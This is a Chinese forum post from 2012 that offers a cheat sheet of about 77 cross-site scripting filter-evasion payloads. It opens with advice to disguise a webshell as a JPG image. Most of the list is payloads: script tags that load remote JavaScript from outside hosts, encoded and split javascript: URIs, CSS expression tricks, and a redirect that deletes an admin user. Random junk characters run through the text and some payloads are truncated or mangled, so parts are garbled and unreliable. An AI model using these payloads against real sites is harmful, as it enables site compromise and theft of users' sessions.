跨站图片shell
$ V; g" Q4 l. X; [XSS跨站代码 <script>alert("")</script>' e1 u0 K1 X2 I6 v5 s
7 P" c, [! O9 T: ^ b( ~
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
& J9 L4 _ D- _5 E5 C- L
. r3 r2 ?! K7 a$ L5 i6 |3 | {3 r' u- j
% e( m* g- u3 W/ ?" ] g+ G1)普通的XSS JavaScript注入
* h( E% K( ~% o0 Y) J5 x1 m6 Y<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
# O4 [5 ~ O( V5 `/ y
& X2 _" d' o3 O& g/ T$ I' {, i& s(2)IMG标签XSS使用JavaScript命令5 Q8 A5 g4 [$ H
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
) g0 T$ C+ z I" U. [8 J- j2 }9 T2 g: O7 y S4 P
(3)IMG标签无分号无引号
0 b: g2 u, _- x4 y% W<IMG SRC=javascript:alert(‘XSS’)> m$ B0 ^- I/ h- l" {% J) Y/ a
2 k' C* \2 \) s* u(4)IMG标签大小写不敏感
o5 H& v6 k, [% R% L7 G<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
9 p7 W$ h$ q3 ^; m; E: _
6 X# f$ k$ n' N$ y; F5 u3 o/ z2 C(5)HTML编码(必须有分号)
, T/ b c% r# O& e<IMG SRC=javascript:alert(“XSS”)>' V0 b4 l( L- U6 [8 ? u3 o
- B. U2 W: o( x* e2 k1 K
(6)修正缺陷IMG标签 L' n- y- N" V# d
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>0 ^! e% z) ^+ u5 ]! A6 h- K% \
( _' w% H# b$ T' d' p' L(7)formCharCode标签(计算器)! t" K. M. J* g; ~
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
7 d, d/ n7 f! H$ W. }) W* K0 ?- R- G$ y: S$ F" v p: I
(8)UTF-8的Unicode编码(计算器)
3 i( W4 ]& ~5 V# P( Q# ]" r<IMG SRC=jav..省略..S')>
' A2 ^* b* z) N& i7 `1 z0 |, U1 W
& I- k1 y6 `2 j& b1 U0 z! o9 @7 X: Q(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
, }9 o* P0 k4 R0 [2 `<IMG SRC=jav..省略..S')>
9 F; [6 E* K' I8 m8 i. X, x" ~( ^
& C8 o% o# W- ]9 C( q/ A) Q [(10)十六进制编码也是没有分号(计算器)% Z x) B7 n( l3 H
<IMG SRC=java..省略..XSS')>
$ K' j6 K) C6 I& G2 @( v8 h8 F3 N& j8 Q+ g$ q: B
(11)嵌入式标签,将Javascript分开 G; [2 a8 I' y6 \( l
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, {& i1 H- a. b7 r: L
# [% f3 |' k: m; r! J/ ]( w: X(12)嵌入式编码标签,将Javascript分开
3 h) U! c/ z; V; F% D: |<IMG SRC=”jav ascript:alert(‘XSS’);”>3 y8 V" ]7 T M6 n) @2 o, M/ _
6 h7 a9 g8 }0 z- A. a5 n(13)嵌入式换行符
% q2 g3 M+ H7 _4 d& d* q<IMG SRC=”jav ascript:alert(‘XSS’);”>" U* r7 B# H6 K7 a, I! x6 J% Y
6 c; U! o) |7 X3 X" D7 _2 O/ l
(14)嵌入式回车
# R" g4 {" H2 M# f2 i$ }% T<IMG SRC=”jav ascript:alert(‘XSS’);”>
) c9 P0 w% A& E7 a, W4 _' [
& ~7 p) i) }9 O! g(15)嵌入式多行注入JavaScript,这是XSS极端的例子
; p6 ^ _1 y7 c) j b6 w5 P<IMG SRC=”javascript:alert(‘XSS‘)”>
6 v8 K, }7 w8 \/ d" N' F% ]9 L
, X. A2 w& M7 o$ d2 K( o2 d' }(16)解决限制字符(要求同页面)
5 }4 N* X: l1 W8 m' O<script>z=’document.’</script>
, _( e% b7 O* y! ^% l<script>z=z+’write(“‘</script>
- Q) U6 k, L5 J1 z; m$ F2 j<script>z=z+’<script’</script>
5 I% ]: w. Y M4 Q& G<script>z=z+’ src=ht’</script>: v% v" q0 w, m. ]7 H
<script>z=z+’tp://ww’</script>' G- h& x: g0 z0 L% \) I7 m7 c. x
<script>z=z+’w.shell’</script>
5 _' @- I+ x: A- {% B<script>z=z+’.net/1.’</script>
c) S4 @/ j5 G<script>z=z+’js></sc’</script>
& @ ?) K% M9 h, I' U' O% i6 u<script>z=z+’ript>”)’</script>
0 S5 ~2 `" w: f2 Y( _<script>eval_r(z)</script>8 V4 G n* g8 S) I: O1 ~0 a2 ]
0 e; N& A+ x0 T4 S0 [
(17)空字符
) K6 ?0 d; S4 i7 Fperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out* ]) V B* H* c* E6 W4 h! y- k' ~" n6 J
" c# ^) K, P8 _+ w1 j% V
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
; P: z3 y: r2 K, k4 U% pperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
6 L, Y- c% ?5 ] j; } }$ Z! t, w5 P, c
(19)Spaces和meta前的IMG标签
, Z/ C. j, E( l% |% K9 `<IMG SRC=” javascript:alert(‘XSS’);”>
5 i/ J1 @5 F- U& i) l: t. k+ O6 u" @# D5 p9 K5 N2 S/ o n( _# I, v& }
(20)Non-alpha-non-digit XSS
6 n% y( N* c: V8 ~; |6 r% g0 c5 j<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>* f" D. E) Y" y. v* w1 n; F3 K
3 Z, P' H) c: o- _; I7 l(21)Non-alpha-non-digit XSS to 2) A9 F6 ^1 _" l- [8 k' Z: R
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>3 e, n, S. ]9 |/ C
0 _( z0 A2 u) e; [- [1 W# q3 H(22)Non-alpha-non-digit XSS to 3& n7 D5 I! z5 ~3 ?; C
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
5 B/ O/ k& ~. h: @, g! C2 K* ?
) o; W& N4 @9 \- t, D0 S( b8 }0 E(23)双开括号5 V. u% T) {3 ]; {/ q1 W: X
<<SCRIPT>alert(“XSS”);//<</SCRIPT>5 I# p6 e9 I* `# J: y. A; b6 v
3 j1 L, n- J/ U2 Y( M/ A6 {
(24)无结束脚本标记(仅火狐等浏览器)
1 l* D& u& V5 k8 i0 q2 Y<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
3 |. x# i( K+ ]# @! ?# b- q {- `
; x8 Z. s4 j! B8 ?(25)无结束脚本标记2! r: z9 l5 [+ H& n$ |3 {
<SCRIPT SRC=//3w.org/XSS/xss.js>
$ C2 L+ M6 g* W* j$ [
0 P3 w( O1 P9 V6 x(26)半开的HTML/JavaScript XSS& v6 [* X) Z; L5 a0 i7 Z8 j
<IMG SRC=”javascript:alert(‘XSS’)”1 Q/ ?+ ^* Q" a; T9 @9 D
: V% T& o1 I6 ]( M; U" h' |1 W/ B(27)双开角括号( p$ X. p/ z% z9 ]! s# L0 T/ O4 n
<iframe src=http://3w.org/XSS.html <
9 T z, X- P- e x1 L% N2 _3 ?) ]/ o6 y
(28)无单引号 双引号 分号
3 y$ H% s. P1 e6 r a) ~<SCRIPT>a=/XSS/
2 ~8 p+ I) k. z1 Balert(a.source)</SCRIPT>
2 j4 E; d* d9 \' ^4 s2 f1 ]7 ~" e9 I( f2 f" L# p( |% r; l
(29)换码过滤的JavaScript7 ^6 | _+ I% x; W
\”;alert(‘XSS’);//
# |5 l: d. v" }6 F2 ~+ j
* `5 O+ N8 r! _3 @- R* n* _( K(30)结束Title标签 d4 X; _) E5 a" B- }# G
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
( d. l1 m2 r4 Y3 K m6 k
6 j6 [5 S; M8 ~1 _& O" W- d' Q# Y(31)Input Image
" a8 Y! g) _6 [. N% A r<INPUT SRC=”javascript:alert(‘XSS’);”>5 y( U; o: {+ X* I: N3 c
/ U- d0 \ H* d5 {(32)BODY Image
+ v; }8 z$ a% }<BODY BACKGROUND=”javascript:alert(‘XSS’)”>; ~6 O# V8 g e+ |
& v- q; F9 r/ d% @(33)BODY标签
# L `0 W7 r2 y; t- n% ^3 i<BODY(‘XSS’)>
. d+ ^' l1 o, d3 ^1 y1 x
- `; F+ M* g% b; q* B(34)IMG Dynsrc
5 D5 s9 D6 O( P% d( u<IMG DYNSRC=”javascript:alert(‘XSS’)”>. X# h' T5 l3 f$ s* D7 Q J- g
% y0 r/ i; u. z4 V1 L5 s(35)IMG Lowsrc( S% b+ x1 F5 K; T( Q E8 ~
<IMG LOWSRC=”javascript:alert(‘XSS’)”>$ X- i) m8 x) h
% t7 g" z, y: J(36)BGSOUND
' i# |0 X! K- O4 J# D<BGSOUND SRC=”javascript:alert(‘XSS’);”>. E8 \! p7 d0 t7 o* x" d
- K0 n# K5 }0 W& }1 ?0 ]
(37)STYLE sheet
& F+ y* p5 \2 T! j. W) B4 d7 r1 w7 h<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
+ W1 r O- W' v: d! G6 B8 k4 z
+ v; r P8 {, _# h" Y(38)远程样式表) Y/ r( @ l% c
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>" J( C7 ?2 k) ] {& P
# l7 r6 S0 j+ C- x( ]: `) [. D& r
(39)List-style-image(列表式), M/ C4 W- M1 ^; P8 p* U4 q; e: S; s
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
8 i6 p( J, m" c: W! X& i X( z7 r
: I( E3 n# i/ y1 O+ a0 D(40)IMG VBscript' @% r; @4 ]- w% Z E4 u
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
# g. p' S) m ^1 A9 O/ S8 V+ G2 S) _4 B! A" k
(41)META链接url
* ^" K# h( e! Z; l9 f<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
0 W) Y- I( m( Q9 u0 W# ^2 j9 l$ _6 n) R; [$ y( C$ I
(42)Iframe/ ~7 m' n! \0 J8 O( `% J
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
! H9 S0 S1 e9 W5 y) @* w. f- _+ p, g(43)Frame
; ^0 t) l1 v& Z) h" @<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>( k' _& t. h9 F( k' w$ m
7 w4 g( {9 x$ P7 t
(44)Table T- U- j* U$ O9 u+ t i
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
0 O2 z' M- u+ k0 ~3 X" N, A+ K
7 ]. [4 y; I6 n U(45)TD) G' H2 J' R/ T+ \
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>1 ~- ?$ J# t2 q: n' {
2 n6 s1 M) \1 @* r4 \(46)DIV background-image: Y- o5 v; r% u+ I; @& m
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>5 r7 D( @: {( r' J9 j9 |( h" {
- {9 T$ m! r+ r+ ?
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)& P( S- u% H: Y
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>; Y# V2 x, Z# P" b0 ?
" }1 ?5 f3 V* f# N8 Y1 p! R u(48)DIV expression
. j4 w9 d( f4 C" R) r: T% c<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
" ^/ V5 p5 R9 k! c0 D8 v3 O8 Q+ |( K/ g% X9 m2 r
(49)STYLE属性分拆表达4 x/ O; {, N5 D/ n9 v5 N0 _" J; p
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
4 u2 C; G1 R; ?; ]* Y- D8 j: ?
) W; p- E( S, d(50)匿名STYLE(组成:开角号和一个字母开头). l5 n/ G; }/ M) V* U* H7 L3 [
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>) {9 h; Y0 g2 V7 r/ x4 d8 h
: o' O7 D0 Q$ ?(51)STYLE background-image
; ]7 H& y, B- z6 g<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
; K6 i$ e, `9 T
+ p+ @5 F& w2 w(52)IMG STYLE方式
% @; g* i- @' [# s6 m$ `+ W+ Qexppression(alert(“XSS”))’>1 E5 _( |% ~6 A9 ~' c/ W# m
2 f5 g$ ?* G# M6 y(53)STYLE background
" i8 V7 z0 \) M/ p7 M2 l<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
& w6 c/ z! C% g: ?7 i$ l! ^% y1 n- H J
(54)BASE$ k) O- C. V& `1 {
<BASE HREF=”javascript:alert(‘XSS’);//”>
4 ]/ o7 I4 {' G) a, u' h1 a$ c" X( ^# h" t- y& ]3 M/ g" q
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
$ {0 e9 e$ r- q' K ~7 C+ W9 I- S<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>) V' ?* a8 G' B7 L% W
- c- {; L3 }2 E. J(56)在flash中使用ActionScrpt可以混进你XSS的代码
. |1 f" T1 p) g2 R* B- }a=”get”;* Z' D. Y3 }0 p$ k# B( U/ ?
b=”URL(\”";6 T; [! \' k) l+ q9 C7 b, ~
c=”javascript:”;% x" K/ {! X- u% o Z7 m; g
d=”alert(‘XSS’);\”)”;5 e/ G' l+ N7 B2 `% A! D( t
eval_r(a+b+c+d);+ h/ r! J- {- l
* G6 k$ y: E3 Y; T! d9 f(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上! F- m" o" B& }
<HTML xmlns:xss>8 e% e" K9 O. j
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>( T9 G. I6 H' K2 m Y7 o
<xss:xss>XSS</xss:xss># M$ P; q: g" b* g+ _
</HTML>( k9 x5 h% \) Z3 c
" `2 H; W/ f( \) E4 ] H# T(58)如果过滤了你的JS你可以在图片里添加JS代码来利用" \$ k7 n' y, Q! f0 D
<SCRIPT SRC=””></SCRIPT>% q, e8 A' o0 f0 R$ [7 D" |3 S
+ g1 j/ w( \/ C$ s8 z6 S. t8 U) r& d(59)IMG嵌入式命令,可执行任意命令5 e! Q+ h4 o$ a6 x4 W; u h- W4 p- x) K
<IMG SRC=”http://www.XXX.com/a.php?a=b”> a! z l3 q( W
( a! [4 F2 h# X& y: G. C' V9 E: m
(60)IMG嵌入式命令(a.jpg在同服务器)
' H/ l' s, @$ V. mRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser0 v% _) ~7 @( c- l8 m4 m B
9 h/ n1 {2 p m+ Y5 h# f
(61)绕符号过滤
; P1 S) U% Z5 @$ {8 G<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>0 q% L, u+ G- a |4 A
) F% M$ _' T1 B2 _2 P* ?; {(62)" p! M1 m5 f8 G3 k: J) }8 f- l
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, q6 y u9 [. K% W* l* s; E
) n: A; r% f5 \) P6 k- }7 ^(63)$ R& E" I& Z0 j* g8 |2 u
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>3 E2 I f4 U3 K9 J0 _" v
: A7 C3 m/ u* H7 }
(64)1 z) i3 J( S5 [# k: ?
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>2 S8 X. V) x0 a) D- x
! z3 M! l% z. B5 C4 [6 e
(65)
, O% ^; Z+ `$ T6 D<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>, ]9 P. `$ p" `8 }& n. ], ^
2 [* A5 |. u R3 I8 Z(66)% H q! s5 X3 j' D8 a- s {
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
. \9 A" P, `7 ?. b$ U$ T7 \) y9 k0 q* _) h
(67)
1 N. S! d" Z! j- q" Q<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT> d9 \0 @% M4 B' t0 H" f
% o2 o+ }' u: c: d" r% @- O i# c(68)URL绕行: C( N) g2 r& d; d9 ~
<A HREF=”http://127.0.0.1/”>XSS</A>! l/ {8 m# S, T
- R9 K3 v& R& v/ T7 M# O
(69)URL编码 O1 n7 a( L( L0 }; W
<A HREF=”http://3w.org”>XSS</A>+ \# f7 l- w* i9 G! Q
7 {7 p7 V a1 P- n2 O2 ? h, q
(70)IP十进制
, t% ^" w4 s, [& Z( M0 H<A HREF=”http://3232235521″>XSS</A>
. K4 E9 E% @: f, q' Z: K/ m4 `' }1 N# g+ M# h1 T/ ~7 W5 h
(71)IP十六进制3 y8 @) ^/ M6 A& P" T
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>( f0 Z/ u3 Q7 z1 i ^
# g0 t# \- c r' D# q k: ^0 W(72)IP八进制; @/ c" d1 [+ A
<A HREF=”http://0300.0250.0000.0001″>XSS</A>. X) o4 T8 g9 h7 A/ J
! ?; X6 [) J! O4 \(73)混合编码
! |, e+ `, O; p$ ?/ p: }: L: y3 u2 w3 I<A HREF=”h/ w7 p: x2 F0 S% F7 J
tt p://6 6.000146.0×7.147/”">XSS</A>
: x; y2 z8 j# b3 e
3 G, z! }; x" v4 z- @(74)节省[http:]
. \9 X' I' R! m. K6 u" v/ q<A HREF=”//www.google.com/”>XSS</A>
( g) y; K* ~7 U9 ?* l. C9 R
; J8 k0 H0 w. Y4 O% u! g- {, W5 S(75)节省[www]- d8 w: q& v" C6 }; P* w7 M
<A HREF=”http://google.com/”>XSS</A>% |* r+ i, ~4 p
8 l8 I. _. ~# t0 h& q E% U5 M
(76)绝对点绝对DNS
/ L5 K2 d8 _+ s* W9 Z* L<A HREF=”http://www.google.com./”>XSS</A>
/ ?1 }0 S1 h( R" }# `; {( M- U: f! D$ N" q, t- c0 s
(77)javascript链接+ z' h1 O2 _7 {0 x$ I) ]* Q' y
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
b2 G" ? F; \; C4 H |
发表于 2012-9-13 17:04:56
收藏
支持
反对